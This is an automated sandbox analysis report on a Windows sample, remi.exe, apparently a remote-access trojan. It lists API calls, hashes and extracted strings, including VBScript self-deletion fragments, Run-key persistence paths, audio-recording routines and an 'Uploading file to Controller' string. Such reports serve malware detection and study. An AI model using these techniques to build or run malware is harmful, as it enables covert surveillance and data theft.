                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                                                                                                                                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                                                                                                                                                                • API String ID: 3797177996-1998216422
                                                                                                                                                                                                                                                                                                • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                                                                                                                                                                                                                                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                                                                                                                                                                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                                                                                                                                                                                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                                                                                                                                                                                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                                                                                                                                                                                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                                                                                                                                                                                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                                                                                                                                                                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                                                                                                                                                                                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                                                                                                                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                                                                                                                                                                • API String ID: 738084811-1408154895
                                                                                                                                                                                                                                                                                                • Opcode ID: 67a24f6113aabf6128109dc61cf26ab2441941a35e225fe1c9d441213504bd5b
                                                                                                                                                                                                                                                                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67a24f6113aabf6128109dc61cf26ab2441941a35e225fe1c9d441213504bd5b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$Write$Create
                                                                                                                                                                                                                                                                                                • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                                                                                                                                                • API String ID: 1602526932-4212202414
                                                                                                                                                                                                                                                                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                                                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\remi.exe,00000001,004068B2,C:\Users\user\Desktop\remi.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\remi.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                                                                                                                                                • API String ID: 1646373207-551307011
                                                                                                                                                                                                                                                                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                                                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                                                                                                                                                                                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                                                                                                                                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                                                                                                                                                                                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                                                                                                                                                                                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041B313
                                                                                                                                                                                                                                                                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041B370
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                                                                • API String ID: 3941738427-1684325040
                                                                                                                                                                                                                                                                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                                                                                                                                                                                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3899193279-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                                                                                                                                                                                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                                                                                                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                                                                                                                                • API String ID: 1223786279-3931108886
                                                                                                                                                                                                                                                                                                • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                                                                                                                                                                                                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                                                                                                                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                                                                                                                                                • API String ID: 2490988753-744132762
                                                                                                                                                                                                                                                                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                                                                                                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                                                                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseEnumOpen
                                                                                                                                                                                                                                                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                                                                                                                                                • API String ID: 1332880857-3714951968
                                                                                                                                                                                                                                                                                                • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                                                                                                                                                                                                                                                                • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                                                                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                                                                                                                                                                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                                                                                                                                                • String ID: Close
                                                                                                                                                                                                                                                                                                • API String ID: 1657328048-3535843008
                                                                                                                                                                                                                                                                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                                                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                                                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                                                                                                • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                                                                                                                                • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                                                                                                                                • API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                                                                                • Opcode ID: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                                                                                                                                                                                                                                • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7205d9af98df91b965123a054d585fa7c0d52e82773df9d6c890248cdbc6b411
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
